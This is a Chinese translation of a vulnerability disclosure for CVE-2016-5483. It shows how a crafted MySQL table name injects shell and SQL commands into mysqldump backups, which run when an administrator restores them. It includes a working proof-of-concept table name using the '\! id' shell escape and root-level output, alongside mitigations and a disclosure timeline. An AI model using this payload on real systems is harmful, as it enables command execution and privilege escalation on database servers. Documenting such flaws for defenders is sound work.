http://p7.qhimg.com/t011bc0a3c5710317fe.jpg


前言


mysqldump是用来创建MySQL数据库逻辑备份的一个常用工具。它在默认配置下可以生成一个.sql文件,其中包含创建/删除表和插入数据等。在导入转储文件的时候,攻击者可以通过制造恶意表名来实现任意SQL语句查询和shell命令执行的目的。另一个与之相关的漏洞利用场景可以参考通过构造数据库名对Galera进行远程代码执行攻击


攻击场景


攻击者已经能够访问你的应用程序并且执行任意SQL查询(比如通过一个过时的Wordpress插件安装的后门)

攻击者拥有创建表的权限(这很常见,许多指南和教程上都建议给安装程序授予此权限,或者执行GRANT ALL PRIVILEGES ON wordpress.*命令来授予Wordpress用户所有的权限)

被攻击目标使用mysqldump进行定期的数据库备份

攻击者想要提升权限并获得更多的系统访问


攻击演示


首先,攻击者使用如下查询创建一个恶意的表:

1
2
3
CREATE TABLE `evil  
\! id
select user(),@@version/*`  (test text);

计划备份任务通常会在运行时为每一个表创建一个包含入口点的转储文件,格式类似于下面这样:

1
2
3
--
-- Table structure for table `tablename`
--

但是,用我们创建的恶意表名会让这个入口点变成这样:

1
2
3
4
5
--
-- Table structure for table `evil
\! id
select user(),@@version/*`  
--

正如你所看到的,表名中的新行让攻击者能够插入任意行数的MySQL命令。一旦这段攻击载荷被成功导入,它将做如下几件事:

如果是它被mysql命令行客户端导入的,那么将通过sh执行id命令

它将执行一个任意查询,可以输出导入它的MySQL用户名和服务器版本

现在,攻击者开始在数据库中删除一些数据,到处插入一些随机损坏的Unicode字符,使得数据库看上去遭到了破坏。当管理员发现时,立马开始行动,准备从最新的备份中恢复数据。一旦他进行恢复操作,攻击载荷就会被执行:

1
2
3
4
$ mysql test < backup.sql
uid=0(root) gid=0(root) groups=0(root) <-- 攻击者的 shell 命令  
user()    @@version  
root@localhost    10.1.18-MariaDB <-- 攻击者的 sql 查询

正如你看到的一样,攻击者成功地通过强制管理员恢复数据库来执行了一些讨厌的命令。至于如何创造一个能给攻击者留下后门的有效载荷,这就作为练习留给读者。


缓解措施


当使用mysqldump时加上 –skip-comments参数

在任何可能的地方撤销创建表的权限(这是最有效的手段)

在计划备份中只转储表的数据而不是表的结构

使用一些其他替代工具来备份MySQL数据


受影响版本


http://p0.qhimg.com/t0148709b26e92a9cd8.png


披露事记


2016.10.05:发现漏洞并向MariaDB和Oracle报告。

2016.10.06:从MariaDB收到回复,预计将在下个版本中修复。讨论了CVE指配。

2016.10.13:MariaDB确认将在版本5.5.53中修复该漏洞。

2016.10.18:收到CVE编号。

2017.03.09:没有收到来自Oracle Outside的自动回复。超过90天后公开披露漏洞。



本文由 安全客 翻译,作者:overXsky

原文链接:https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups/